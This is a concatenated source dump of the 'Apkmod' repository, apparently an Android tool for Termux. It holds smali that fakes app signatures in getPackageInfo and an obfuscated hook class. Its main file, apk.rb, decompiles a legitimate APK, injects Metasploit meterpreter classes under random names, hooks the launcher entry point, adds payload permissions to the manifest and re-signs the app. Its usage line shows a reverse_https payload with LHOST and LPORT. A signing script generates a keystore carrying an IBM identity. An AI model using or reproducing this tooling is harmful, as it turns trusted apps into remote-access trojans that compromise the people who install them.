Ljava/lang/Object; 353 | .param p2, "method" # Ljava/lang/reflect/Method; 354 | .param p3, "args" # [Ljava/lang/Object; 355 | .annotation system Ldalvik/annotation/Throws; 356 | value = { 357 | Ljava/lang/Throwable; 358 | } 359 | .end annotation 360 | 361 | .prologue 362 | .line 35 363 | const-string/jumbo v4, "getPackageInfo" 364 | 365 | invoke-virtual {p2}, Ljava/lang/reflect/Method;->getName()Ljava/lang/String; 366 | 367 | move-result-object v5 368 | 369 | invoke-virtual {v4, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z 370 | 371 | move-result v4 372 | 373 | if-eqz v4, :cond_4c 374 | 375 | .line 36 376 | const/4 v4, 0x0 377 | 378 | aget-object v3, p3, v4 379 | 380 | check-cast v3, Ljava/lang/String; 381 | 382 | .line 37 383 | .local v3, "pkgName":Ljava/lang/String; 384 | const/4 v4, 0x1 385 | 386 | aget-object v0, p3, v4 387 | 388 | check-cast v0, Ljava/lang/Integer; 389 | 390 | .line 38 391 | .local v0, "flag":Ljava/lang/Integer; 392 | invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I 393 | 394 | move-result v4 395 | 396 | and-int/lit8 v4, v4, 0x40 397 | 398 | if-eqz v4, :cond_4c 399 | 400 | iget-object v4, p0, Lcc/binmt/signature/PmsHookApplication;->appPkgName:Ljava/lang/String; 401 | 402 | invoke-virtual {v4, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z 403 | 404 | move-result v4 405 | 406 | if-eqz v4, :cond_4c 407 | 408 | .line 39 409 | iget-object v4, p0, Lcc/binmt/signature/PmsHookApplication;->base:Ljava/lang/Object; 410 | 411 | invoke-virtual {p2, v4, p3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 412 | 413 | move-result-object v2 414 | 415 | check-cast v2, Landroid/content/pm/PackageInfo; 416 | 417 | .line 40 418 | .local v2, "info":Landroid/content/pm/PackageInfo; 419 | iget-object v4, p0, Lcc/binmt/signature/PmsHookApplication;->sign:[[B 420 | 421 | array-length v4, v4 422 | 423 | new-array v4, v4, [Landroid/content/pm/Signature; 424 | 425 | iput-object v4, v2, Landroid/content/pm/PackageInfo;->signatures:[Landroid/content/pm/Signature; 426 | 427 | .line 41 428 | const/4 v1, 0x0 429 | 430 | .local v1, "i":I 431 | :goto_37 432 | iget-object v4, v2, Landroid/content/pm/PackageInfo;->signatures:[Landroid/content/pm/Signature; 433 | 434 | array-length v4, v4 435 | 436 | if-ge v1, v4, :cond_52 437 | 438 | .line 42 439 | iget-object v4, v2, Landroid/content/pm/PackageInfo;->signatures:[Landroid/content/pm/Signature; 440 | 441 | new-instance v5, Landroid/content/pm/Signature; 442 | 443 | iget-object v6, p0, Lcc/binmt/signature/PmsHookApplication;->sign:[[B 444 | 445 | aget-object v6, v6, v1 446 | 447 | invoke-direct {v5, v6}, Landroid/content/pm/Signature;->([B)V 448 | 449 | aput-object v5, v4, v1 450 | 451 | .line 41 452 | add-int/lit8 v1, v1, 0x1 453 | 454 | goto :goto_37 455 | 456 | .line 47 457 | .end local v0 # "flag":Ljava/lang/Integer; 458 | .end local v1 # "i":I 459 | .end local v2 # "info":Landroid/content/pm/PackageInfo; 460 | .end local v3 # "pkgName":Ljava/lang/String; 461 | :cond_4c 462 | iget-object v4, p0, Lcc/binmt/signature/PmsHookApplication;->base:Ljava/lang/Object; 463 | 464 | invoke-virtual {p2, v4, p3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 465 | 466 | move-result-object v2 467 | 468 | :cond_52 469 | return-object v2 470 | .end method -------------------------------------------------------------------------------- /hooks/hook2.dex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hax4us/Apkmod/42d3aaac87dce9d3285150172acf2e75a02d7a2f/hooks/hook2.dex -------------------------------------------------------------------------------- /hooks/hook2.smali: -------------------------------------------------------------------------------- 1 | .class public Lcom/ysh/hook/App; 2 | .super Landroid/app/Application; 3 | .source "App.java" 4 | 5 | 6 | # direct methods 7 | .method public constructor ()V 8 | .registers 1 9 | 10 | .prologue 11 | .line 16 12 | invoke-direct {p0}, Landroid/app/Application;->()V 13 | 14 | return-void 15 | .end method 16 | 17 | 18 | # virtual methods 19 | .method public onCreate()V 20 | .registers 2 21 | 22 | .line 13 23 | new-instance v0, Lcom/ysh/hook/oooo0o00OO; 24 | 25 | invoke-direct {v0, p0}, Lcom/ysh/hook/oooo0o00OO;->(Landroid/content/Context;)V 26 | 27 | invoke-static {v0}, Lcom/ysh/hook/ooo0ooOoo0;->OO0o0Oo00o(Ljava/lang/Object;)V 28 | 29 | .line 14 30 | invoke-static {p0}, Lcom/ysh/hook/ooo0ooOoo0;->OoooO00OOo(Ljava/lang/Object;)V 31 | 32 | .line 15 33 | invoke-super {p0}, Landroid/app/Application;->onCreate()V 34 | 35 | return-void 36 | .end method -------------------------------------------------------------------------------- /scripts/TermuxAlpine.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash -e 2 | # Copyright ©2019 by Hax4Us. All rights reserved. 3 | # 4 | # Email : lkpandey950@gmail.com 5 | ################################################################################ 6 | 7 | # colors 8 | 9 | red='\033[1;31m' 10 | yellow='\033[1;33m' 11 | blue='\033[1;34m' 12 | reset='\033[0m' 13 | 14 | 15 | # Destination Path 16 | 17 | DESTINATION=${PREFIX}/share/apkmod 18 | rm -rf $DESTINATION 19 | mkdir -p ${DESTINATION} 20 | cd ${DESTINATION} 21 | 22 | # Utility function for Unknown Arch 23 | 24 | unknownarch() { 25 | printf "$red" 26 | echo "[*] Unknown Architecture :(" 27 | printf "$reset" 28 | exit 1 29 | } 30 | 31 | # Utility function for detect system 32 | 33 | checksysinfo() { 34 | printf "$blue [*] Checking host architecture ..." 35 | case $(getprop ro.product.cpu.abi) in 36 | arm64-v8a) 37 | SETARCH=aarch64 38 | ;; 39 | armeabi|armeabi-v7a) 40 | SETARCH=armhf 41 | ;; 42 | x86|i686) 43 | SETARCH=x86 44 | ;; 45 | x86_64) 46 | SETARCH=x86_64 47 | ;; 48 | *) 49 | unknownarch 50 | ;; 51 | esac 52 | } 53 | 54 | # Check if required packages are present 55 | 56 | checkdeps() { 57 | printf "${blue}\n" 58 | echo " [*] Updating apt cache..." 59 | apt update -y &> /dev/null 60 | echo " [*] Checking for all required tools..." 61 | 62 | for i in proot bsdtar curl; do 63 | if [ -e ${PREFIX}/bin/$i ]; then 64 | echo " • $i is OK" 65 | else 66 | echo "Installing ${i}..." 67 | apt install -y $i || { 68 | printf "$red" 69 | echo " ERROR: check your internet connection or apt\n Exiting..." 70 | printf "$reset" 71 | exit 1 72 | } 73 | fi 74 | done 75 | } 76 | 77 | # URLs of all possibls architectures 78 | 79 | seturl() { 80 | # ALPINE_VER=$(curl -s http://dl-cdn.alpinelinux.org/alpine/latest-stable/releases/$SETARCH/latest-releases.yaml | grep -m 1 -o version.* | sed -e 's/[^0-9.]*//g' -e 's/-$//') 81 | # if [ -z "$ALPINE_VER" ] ; then 82 | # exit 1 83 | # fi 84 | ALPINE_VER=3.13.2 85 | # ALPINE_URL="http://dl-cdn.alpinelinux.org/alpine/latest-stable/releases/$SETARCH/alpine-minirootfs-$ALPINE_VER-$SETARCH.tar.gz" 86 | ALPINE_URL="http://dl-cdn.alpinelinux.org/alpine/v3.13/releases/${SETARCH}/alpine-minirootfs-${ALPINE_VER}-${SETARCH}.tar.gz" 87 | } 88 | 89 | # Utility function to get tar file 90 | 91 | gettarfile() { 92 | printf "$blue [*] Getting tar file...$reset\n\n" 93 | seturl $SETARCH 94 | curl --progress-bar -L --fail --retry 4 -O "$ALPINE_URL" 95 | rootfs="alpine-minirootfs-$ALPINE_VER-$SETARCH.tar.gz" 96 | } 97 | 98 | # Utility function to get SHA 99 | 100 | getsha() { 101 | printf "\n${blue} [*] Getting SHA ... $reset\n\n" 102 | curl --progress-bar -L --fail --retry 4 -O "${ALPINE_URL}.sha256" 103 | } 104 | 105 | # Utility function to check integrity 106 | 107 | checkintegrity() { 108 | printf "\n${blue} [*] Checking integrity of file...\n" 109 | echo " [*] The script will immediately terminate in case of integrity failure" 110 | printf ' ' 111 | sha256sum -c ${rootfs}.sha256 || { 112 | printf "$red Sorry :( to say your downloaded linux file was corrupted or half downloaded, but don't worry, just rerun my script\n${reset}" 113 | exit 1 114 | } 115 | } 116 | 117 | # Utility function to extract tar file 118 | 119 | extract() { 120 | printf "$blue [*] Extracting... $reset\n\n" 121 | proot --link2symlink -0 bsdtar -xpf $rootfs 2> /dev/null || : 122 | } 123 | 124 | # Utility function for login file 125 | 126 | createloginfile() { 127 | bin=${PREFIX}/bin/apkmalpine 128 | cat > $bin <<- EOM 129 | #!/data/data/com.termux/files/usr/bin/bash -e 130 | unset LD_PRELOAD 131 | # thnx to @j16180339887 for DNS picker 132 | addresolvconf () 133 | { 134 | android=\$(getprop ro.build.version.release) 135 | if [ \${android%%.*} -lt 8 ]; then 136 | [ \$(command -v getprop) ] && getprop | sed -n -e 's/^\[net\.dns.\]: \[\(.*\)\]/\1/p' | sed '/^\s*$/d' | sed 's/^/nameserver /' > \${PREFIX}/share/apkmod/etc/resolv.conf 137 | fi 138 | } 139 | addresolvconf 140 | exec proot --link2symlink -0 -r \${PREFIX}/share/apkmod/ -b /dev/ -b /sys/ -b /proc/ -b /sdcard -b /storage -b \$HOME -w /home /usr/bin/env HOME=/root PREFIX=/usr SHELL=/bin/sh TERM="\$TERM" LANG=\$LANG PATH=/bin:/usr/bin:/sbin:/usr/sbin /bin/sh --login 141 | EOM 142 | 143 | chmod 700 $bin 144 | } 145 | 146 | # Utility function to touchup Alpine 147 | 148 | finalwork() { 149 | [ ! -e ${DESTINATION}/finaltouchup.sh ] && curl --silent -LO https://raw.githubusercontent.com/Hax4us/Apkmod/master/scripts/finaltouchup.sh 150 | if [ "${MOTD}" = "ON" ]; then 151 | bash ${DESTINATION}/finaltouchup.sh --add-motd 152 | else 153 | bash ${DESTINATION}/finaltouchup.sh 154 | fi 155 | rm ${DESTINATION}/finaltouchup.sh 156 | } 157 | 158 | 159 | 160 | # Utility function for cleanup 161 | 162 | cleanup() { 163 | if [ -d ${DESTINATION} ]; then 164 | rm -rf ${DESTINATION} 165 | else 166 | printf "$red not installed so not removed${reset}\n" 167 | exit 168 | fi 169 | if [ -e ${PREFIX}/bin/apkmalpine ]; then 170 | rm ${PREFIX}/bin/apkmalpine 171 | printf "$yellow uninstalled :) ${reset}\n" 172 | exit 173 | else 174 | printf "$red not installed so not removed${reset}\n" 175 | fi 176 | } 177 | 178 | printline() { 179 | printf "${blue}\n" 180 | echo " #------------------------------------------#" 181 | } 182 | 183 | usage() { 184 | printf "${yellow}\nUsage: ${green}bash TermuxAlpine.sh [option]\n${blue} --uninstall uninstall alpine\n --add-motd create motd file\n${reset}\n" 185 | } 186 | 187 | # Start 188 | 189 | MOTD="OFF" 190 | EXTRAARGS="default" 191 | if [ ! -z "$1" ] 192 | then 193 | EXTRAARGS=$1 194 | fi 195 | if [ "$EXTRAARGS" = "--uninstall" ]; then 196 | cleanup 197 | exit 1 198 | elif [ "$EXTRAARGS" = "--add-motd" ]; then 199 | MOTD="ON" 200 | elif [ $# -ge 1 ] 201 | then 202 | usage 203 | exit 1 204 | fi 205 | #printf "\n${yellow} You are going to install Alpine in termux ;) Cool\n press ENTER to continue\n" 206 | #read enter 207 | 208 | checksysinfo 209 | checkdeps 210 | gettarfile 211 | getsha 212 | checkintegrity 213 | extract 214 | createloginfile 215 | 216 | printf "$blue [*] Configuring Alpine For You ..." 217 | finalwork 218 | printline 219 | printf "\n${yellow} Now you can enjoy a very small (just 1 MB!) Linux environment in your Termux :)\n Don't forget to star my work\n" 220 | printline 221 | printline 222 | printf "\n${blue} [*] Email :${yellow} lkpandey950@gmail.com\n" 223 | printf "$blue [*] Website :${yellow} https://hax4us.com\n" 224 | printf "$blue [*] YouTube :${yellow} https://youtube.com/hax4us\n" 225 | printline 226 | printf "$red \n NOTE : $yellow use ${red}--uninstall${yellow} option for uninstall\n" 227 | printline 228 | printf "$reset" 229 | -------------------------------------------------------------------------------- /scripts/apk.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | require 'msf/core' 4 | require 'rex/text' 5 | require 'tmpdir' 6 | require 'nokogiri' 7 | require 'fileutils' 8 | require 'optparse' 9 | require 'open3' 10 | require 'date' 11 | 12 | class Msf::Payload::Apk 13 | 14 | def print_status(msg='') 15 | $stderr.puts "[*] #{msg}" 16 | end 17 | 18 | def print_error(msg='') 19 | $stderr.puts "[-] #{msg}" 20 | end 21 | 22 | alias_method :print_bad, :print_error 23 | 24 | def usage 25 | print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" 26 | print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" 27 | end 28 | 29 | def run_cmd(cmd) 30 | begin 31 | stdin, stdout, stderr = Open3.popen3(cmd) 32 | return stdout.read + stderr.read 33 | rescue Errno::ENOENT 34 | return nil 35 | end 36 | end 37 | 38 | # Find a suitable smali point to hook 39 | def find_hook_point(amanifest) 40 | package = amanifest.xpath("//manifest").first['package'] 41 | application = amanifest.xpath('//application') 42 | application_name = application.attribute("name") 43 | if application_name 44 | return application_name.to_s 45 | #application_str = application_name.to_s 46 | #unless application_str == 'android.app.Application' 47 | #return application_str 48 | #end 49 | end 50 | activities = amanifest.xpath("//activity|//activity-alias") 51 | for activity in activities 52 | activityname = activity.attribute("targetActivity") 53 | unless activityname 54 | activityname = activity.attribute("name") 55 | end 56 | category = activity.search('category') 57 | unless category 58 | next 59 | end 60 | for cat in category 61 | categoryname = cat.attribute('name') 62 | if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') 63 | name = activityname.to_s 64 | if name.start_with?('.') 65 | name = package + name 66 | end 67 | return name 68 | end 69 | end 70 | end 71 | end 72 | 73 | def parse_manifest(manifest_file) 74 | File.open(manifest_file, "rb"){|file| 75 | data = File.read(file) 76 | return Nokogiri::XML(data) 77 | } 78 | end 79 | 80 | def fix_manifest(tempdir, package, main_service, main_broadcast_receiver) 81 | #Load payload's manifest 82 | payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml") 83 | payload_permissions = payload_manifest.xpath("//manifest/uses-permission") 84 | 85 | #Load original apk's manifest 86 | original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml") 87 | original_permissions = original_manifest.xpath("//manifest/uses-permission") 88 | 89 | old_permissions = [] 90 | add_permissions = [] 91 | 92 | original_permissions.each do |permission| 93 | name = permission.attribute("name").to_s 94 | old_permissions << name 95 | end 96 | 97 | application = original_manifest.xpath('//manifest/application') 98 | payload_permissions.each do |permission| 99 | name = permission.attribute("name").to_s 100 | unless old_permissions.include?(name) 101 | add_permissions += [permission.to_xml] 102 | end 103 | end 104 | add_permissions.shuffle! 105 | for permission_xml in add_permissions 106 | print_status("Adding #{permission_xml}") 107 | if original_permissions.empty? 108 | application.before(permission_xml) 109 | original_permissions = original_manifest.xpath("//manifest/uses-permission") 110 | else 111 | original_permissions.before(permission_xml) 112 | end 113 | end 114 | 115 | application = original_manifest.at_xpath('/manifest/application') 116 | receiver = payload_manifest.at_xpath('/manifest/application/receiver') 117 | service = payload_manifest.at_xpath('/manifest/application/service') 118 | receiver.attributes["name"].value = package + '.' + main_broadcast_receiver 119 | receiver.attributes["label"].value = main_broadcast_receiver 120 | service.attributes["name"].value = package + '.' + main_service 121 | application << receiver.to_xml 122 | application << service.to_xml 123 | 124 | File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml } 125 | end 126 | 127 | def parse_orig_cert_data(orig_apkfile) 128 | orig_cert_data = Array[] 129 | keytool_output = run_cmd(%Q{keytool -J-Duser.language=en -printcert -jarfile "#{orig_apkfile}"}) 130 | owner_line = keytool_output.match(/^Owner:.+/)[0] 131 | orig_cert_dname = owner_line.gsub(/^.*:/, '').strip 132 | orig_cert_data.push("#{orig_cert_dname}") 133 | valid_from_line = keytool_output.match(/^Valid from:.+/)[0] 134 | from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip 135 | to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip 136 | from_date = DateTime.parse("#{from_date_str}") 137 | orig_cert_data.push(from_date.strftime("%Y/%m/%d %T")) 138 | to_date = DateTime.parse("#{to_date_str}") 139 | validity = (to_date - from_date).to_i 140 | orig_cert_data.push("#{validity}") 141 | return orig_cert_data 142 | end 143 | 144 | def backdoor_apk(apkfile, raw_payload, use_aapt) 145 | unless apkfile && File.readable?(apkfile) 146 | usage 147 | raise RuntimeError, "Invalid template: #{apkfile}" 148 | end 149 | 150 | #keytool = run_cmd("keytool") 151 | #unless keytool != nil 152 | #raise RuntimeError, "keytool not found. If it's not in your PATH, please add it." 153 | #end 154 | 155 | #jarsigner = run_cmd("jarsigner") 156 | #unless jarsigner != nil 157 | #raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." 158 | #end 159 | 160 | #zipalign = run_cmd("zipalign") 161 | #unless zipalign != nil 162 | #raise RuntimeError, "zipalign not found. If it's not in your PATH, please add it." 163 | #end 164 | 165 | #apktool = run_cmd("apktool -version") 166 | #unless apktool != nil 167 | #raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." 168 | #end 169 | 170 | #apk_v = Gem::Version.new(apktool) 171 | #unless apk_v >= Gem::Version.new('2.0.1') 172 | #raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." 173 | #end 174 | 175 | #Create temporary directory where work will be done 176 | tempdir = "/data/data/com.termux/files/usr/share/apkmod/root/.bind" 177 | #run_cmd("rm -f $PREFIX/share/TermuxAlpine/root/.local/share/apktool/framework/1.apk") 178 | frameworkdir = "/data/data/com.termux/files/home/.apkmod/framework" 179 | 180 | #keystore = "#{tempdir}/signing.keystore" 181 | #storepass = "android" 182 | #keypass = "android" 183 | #keyalias = "signing.key" 184 | #orig_cert_data = parse_orig_cert_data(apkfile) 185 | #orig_cert_dname = orig_cert_data[0] 186 | #orig_cert_startdate = orig_cert_data[1] 187 | #orig_cert_validity = orig_cert_data[2] 188 | 189 | #print_status "Creating signing key and keystore..\n" 190 | #run_cmd("keytool -genkey -v -keystore #{keystore} \ 191 | #-alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \ 192 | #-keysize 2048 -startdate '#{orig_cert_startdate}' \ 193 | #-validity #{orig_cert_validity} -dname '#{orig_cert_dname}'") 194 | run_cmd("rm -rf #{tempdir}/*") 195 | 196 | File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } 197 | FileUtils.cp apkfile, "#{tempdir}/original.apk" 198 | 199 | if use_aapt 200 | aapt = "-a /usr/bin/aapt" 201 | else 202 | aapt = "-a /usr/bin/aapt2" 203 | end 204 | 205 | print_status "Decompiling original APK..\n" 206 | run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") 207 | print_status "Decompiling payload APK..\n" 208 | run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") 209 | 210 | amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml") 211 | 212 | print_status "Locating hook point..\n" 213 | hookable_class = find_hook_point(amanifest) 214 | smalifile = "#{tempdir}/original/smali*/" + hookable_class.gsub(/\./, "/") + ".smali" 215 | smalifiles = Dir.glob(smalifile) 216 | for smalifile in smalifiles 217 | if File.readable?(smalifile) 218 | hooksmali = File.read(smalifile) 219 | break 220 | end 221 | end 222 | 223 | unless hooksmali 224 | raise RuntimeError, "Unable to find hook point in #{smalifile}\n" 225 | end 226 | 227 | entrypoint = 'return-void' 228 | unless hooksmali.include? entrypoint 229 | raise RuntimeError, "Unable to find hookable function in #{smalifile}\n" 230 | end 231 | 232 | # Remove unused files 233 | FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali" 234 | FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") 235 | 236 | package = amanifest.xpath("//manifest").first['package'] 237 | package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" 238 | classes = {} 239 | classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize 240 | classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize 241 | classes['MainBroadcastReceiver'] = Rex::Text::rand_text_alpha_lower(5).capitalize 242 | package_slash = package.gsub(/\./, "/") 243 | print_status "Adding payload as package #{package}\n" 244 | payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali") 245 | payload_dir = "#{tempdir}/original/smali/#{package_slash}/" 246 | FileUtils.mkdir_p payload_dir 247 | 248 | # Copy over the payload files, fixing up the smali code 249 | payload_files.each do |file_name| 250 | smali = File.read(file_name) 251 | smali_class = File.basename file_name 252 | for oldclass, newclass in classes 253 | if smali_class == "#{oldclass}.smali" 254 | smali_class = "#{newclass}.smali" 255 | end 256 | smali.gsub!(/com\/metasploit\/stage\/#{oldclass}/, package_slash + "/" + newclass) 257 | end 258 | smali.gsub!(/com\/metasploit\/stage/, package_slash) 259 | newfilename = "#{payload_dir}#{smali_class}" 260 | File.open(newfilename, "wb") {|file| file.puts smali } 261 | end 262 | 263 | payloadhook = %Q^invoke-static {}, L#{package_slash}/#{classes['MainService']};->start()V 264 | 265 | ^ + entrypoint 266 | hookedsmali = hooksmali.sub(entrypoint, payloadhook) 267 | 268 | print_status "Loading #{smalifile} and injecting payload..\n" 269 | File.open(smalifile, "wb") {|file| file.puts hookedsmali } 270 | 271 | injected_apk = "#{tempdir}/output.apk" 272 | signed_apk = "#{tempdir}/signed.apk" 273 | print_status "Poisoning the manifest with meterpreter permissions..\n" 274 | fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver']) 275 | 276 | print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" 277 | 278 | # Temporary fix for invalid file names prefixed with $ 279 | #run_cmd("find #{tempdir}/original -name \"*.xml\" -exec sed -i '/\"\\$/d' {} \\;") 280 | #run_cmd("find #{tempdir}/original -name \"*.xml\" -exec sed -i '/\\/\\$/d' {} \\;") 281 | #run_cmd("find #{tempdir}/original -name \"\\$*\" -delete") 282 | 283 | apktool_output = run_cmd("apktool b #{aapt} -o #{tempdir}/output.apk #{tempdir}/original -p #{frameworkdir}") 284 | unless File.readable?(injected_apk) 285 | print_error apktool_output 286 | raise RuntimeError, "Unable to rebuild apk with apktool" 287 | end 288 | 289 | print_status "Signing #{injected_apk}\n" 290 | run_cmd("apksigner sign --in #{tempdir}/output.apk --out #{tempdir}/signed.apk --ks-type PKCS12 --ks ~/.apkmod/apkmod.p12 --ks-pass pass:apkmod") 291 | #run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}") 292 | 293 | outputapk = File.read(signed_apk) 294 | run_cmd("rm -rf #{tempdir}/*") 295 | 296 | #FileUtils.remove_entry tempdir 297 | outputapk 298 | end 299 | end 300 | 301 | 302 | -------------------------------------------------------------------------------- /scripts/apktool_alpine.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | JAVA="/usr/lib/jvm/java-1.8-openjdk/bin/java" 3 | javaOpts="-Xmx512M -Dfile.encoding=utf-8" 4 | exec $JAVA $javaOpts -jar /opt/apktool.jar "$@" 5 | -------------------------------------------------------------------------------- /scripts/apktool_termux.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/sh 2 | unset LD_PRELOAD 3 | args="$@" 4 | comnd="apktool $args" 5 | exec proot --link2symlink -0 -r ${PREFIX}/share/apkmod/ -b /dev/ -b /sys/ -b /proc/ -b /sdcard -b /storage -b ${HOME} -b ${TMPDIR} -b ${PREFIX}/share -w $HOME /usr/bin/env HOME=/root PREFIX=/usr SHELL=/bin/sh TERM="$TERM" LANG=$LANG PATH=/bin:/usr/bin:/sbin:/usr/sbin LD_LIBRARY_PATH=/usr/lib /bin/sh --login -c "$comnd" 6 | -------------------------------------------------------------------------------- /scripts/finaltouchup.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | addprofile() 3 | { 4 | cat > ${PREFIX}/share/apkmod/etc/profile <<- EOM 5 | export CHARSET=UTF-8 6 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 7 | export PAGER=less 8 | export PS1='[\u@\h \W]\\$ ' 9 | umask 022 10 | for script in /etc/profile.d/*.sh ; do 11 | if [ -r \$script ] ; then 12 | . \$script 13 | fi 14 | done 15 | EOM 16 | } 17 | 18 | addmotd() { 19 | cat > ${PREFIX}/share/TermuxAlpine/etc/profile.d/motd.sh <<- EOM 20 | printf "\n\033[1;34mWelcome to Alpine Linux in Termux! Enjoy!\033[0m\033[1;34m 21 | Chat: \033[0m\033[mhttps://gitter.im/termux/termux/\033[0m\033[1;34m 22 | Help: \033[0m\033[34minfo \033[0m\033[mand \033[0m\033[34mman \033[0m\033[1;34m 23 | Portal: \033[0m\033[mhttps://wiki.termux.com/wiki/Community\033[0m\033[1;34m 24 | 25 | Install a package: \033[0m\033[34mapk add \033[0m\033[1;34m 26 | More information: \033[0m\033[34mapk --help\033[0m\033[1;34m 27 | Search packages: \033[0m\033[34mapk search \033[0m\033[1;34m 28 | Upgrade packages: \033[0m\033[34mapk upgrade \n\033[0m \n" 29 | EOM 30 | } 31 | 32 | updrepos() { 33 | cp ${PREFIX}/share/TermuxAlpine/etc/apk/repositories ${PREFIX}/share/TermuxAlpine/etc/apk/repositories.bak 34 | cat > ${PREFIX}/share/TermuxAlpine/etc/apk/repositories <<- EOM 35 | http://dl-cdn.alpinelinux.org/alpine/latest-stable/main/ 36 | http://dl-cdn.alpinelinux.org/alpine/latest-stable/community/ 37 | http://dl-cdn.alpinelinux.org/alpine/edge/testing/ 38 | EOM 39 | } 40 | # thnx to @j16180339887 for DNS picker 41 | addresolvconf () 42 | { 43 | printf "nameserver 8.8.8.8\nnameserver 8.8.4.4" > ${PREFIX}/share/apkmod/etc/resolv.conf 44 | } 45 | android=$(getprop ro.build.version.release) 46 | addprofile 47 | if [ "${1}" = "--add-motd" ]; then 48 | addmotd 49 | fi 50 | if [ ${android%%.*} -ge 8 ]; then 51 | addresolvconf 52 | fi 53 | #updrepos 54 | -------------------------------------------------------------------------------- /scripts/jadx_alpine.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | APP_HOME=/usr/lib/jadx 4 | CLASSPATH=$APP_HOME/lib/jadx-cli-1.1.0.jar:$APP_HOME/lib/jadx-core-1.1.0.jar:$APP_HOME/lib/dx-1.16.jar:$APP_HOME/lib/android-29-clst.jar:$APP_HOME/lib/android-29-res.jar:$APP_HOME/lib/logback-classic-1.2.3.jar:$APP_HOME/lib/slf4j-api-1.7.29.jar:$APP_HOME/lib/baksmali-2.3.4.jar:$APP_HOME/lib/smali-2.3.4.jar:$APP_HOME/lib/util-2.3.4.jar:$APP_HOME/lib/jcommander-1.78.jar:$APP_HOME/lib/asm-7.2.jar:$APP_HOME/lib/annotations-18.0.0.jar:$APP_HOME/lib/gson-2.8.6.jar:$APP_HOME/lib/dexlib2-2.3.4.jar:$APP_HOME/lib/guava-28.1-jre.jar:$APP_HOME/lib/logback-core-1.2.3.jar:$APP_HOME/lib/antlr-runtime-3.5.2.jar:$APP_HOME/lib/stringtemplate-3.2.1.jar:$APP_HOME/lib/failureaccess-1.0.1.jar:$APP_HOME/lib/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar:$APP_HOME/lib/jsr305-3.0.2.jar:$APP_HOME/lib/checker-qual-2.8.1.jar:$APP_HOME/lib/error_prone_annotations-2.3.2.jar:$APP_HOME/lib/j2objc-annotations-1.3.jar:$APP_HOME/lib/animal-sniffer-annotations-1.18.jar:$APP_HOME/lib/antlr-2.7.7.jar 5 | 6 | DEFAULT_JVM_OPTS='"-Xms128M" "-Xmx4g" "-XX:+UseG1GC"' 7 | 8 | exec java -classpath $CLASSPATH jadx.cli.JadxCLI "$@" 9 | -------------------------------------------------------------------------------- /scripts/jadx_termux.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/sh 2 | unset LD_PRELOAD 3 | args="$@" 4 | cmd="jadx $args" 5 | exec proot --link2symlink -0 -r ${PREFIX}/share/apkmod/ -b /dev/ -b /sys/ -b /proc/ -b /sdcard -b /storage -b ${HOME} -b ${TMPDIR} -b ${PREFIX}/share -w $HOME /usr/bin/env HOME=/root PREFIX=/usr SHELL=/bin/sh TERM="$TERM" LANG=$LANG PATH=/bin:/usr/bin:/sbin:/usr/sbin LD_LIBRARY_PATH=/usr/lib /bin/sh --login -c "$cmd" 6 | -------------------------------------------------------------------------------- /scripts/signapk_alpine.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | KEYTOOL="/usr/lib/jvm/java-1.8-openjdk/bin/keytool" 4 | JARSIGNER="/usr/lib/jvm/java-1.8-openjdk/bin/jarsigner" 5 | 6 | if [ ! -f $HOME/apkmod.keystore ]; then 7 | $KEYTOOL -noprompt -dname "CN=mqttserver.ibm.com, OU=ID, O=IBM, L=Hursley, S=Hants, C=GB" -storepass hax4us -genkey -v -keystore $HOME/apkmod.keystore -alias hax4us -keyalg RSA -validity 10000 -keypass hax4us 8 | fi 9 | 10 | exec $JARSIGNER "$@" 11 | -------------------------------------------------------------------------------- /scripts/signapk_termux.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/sh 2 | unset LD_PRELOAD 3 | args="$@" 4 | 